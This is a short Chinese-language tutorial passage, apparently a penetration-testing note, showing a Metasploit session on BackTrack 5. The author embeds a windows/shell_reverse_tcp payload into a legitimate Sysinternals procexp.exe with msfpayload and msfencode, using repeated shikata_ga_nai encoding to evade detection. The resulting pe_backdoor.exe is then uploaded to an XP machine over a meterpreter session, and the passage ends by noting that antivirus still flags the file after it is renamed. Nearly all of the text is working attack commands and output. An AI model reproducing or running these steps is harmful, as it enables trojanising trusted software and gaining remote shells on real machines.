在网上下载Sysinternals,解压,得到procexp.exe,把它传到BT5上去,然后生成pe_backdoor.exe
root@bt:/opt/metasploit/msf3# mkdir work
root@bt:/opt/metasploit/msf3# cp ~/procexp.exe work/
root@bt:/opt/metasploit/msf3# ls work/
procexp.exe
root@bt:/opt/metasploit/msf3# time msfpayload windows/shell_reverse_tcp LHOST=192.168.1.11 LPORT=8080 R | msfencode -t exe -x work/procexp.exe -o pe_backdoor.exe -e x86/shikata_ga_nai -c 5
[*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 368 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 395 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 422 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 449 (iteration=5)
real 0m40.713s
user 0m24.734s
sys 0m15.513s
root@bt:/opt/metasploit/msf3# ls
armitage documentation HACKING msfbinscan msfd msfgui msfpescan msfrpcd pe_backdoor.exe scripts THIRD-PARTY.md
COPYING external lib msfcli msfelfscan msfmachscan msfrop msfupdate plugins spec tools
data Gemfile modules msfconsole msfencode msfpayload msfrpc msfvenom README.md test work
root@bt:/opt/metasploit/msf3# file pe_backdoor.exe
pe_backdoor.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
root@bt:/opt/metasploit/msf3# mv pe_backdoor.exe ~/
上传到XP:
meterpreter > upload pe_backdoor.exe
[*] uploading : pe_backdoor.exe -> pe_backdoor.exe
[*] uploaded : pe_backdoor.exe -> pe_backdoor.exe
meterpreter >
杀毒软件报告威胁,文件名改为hello.exe,也报告威胁。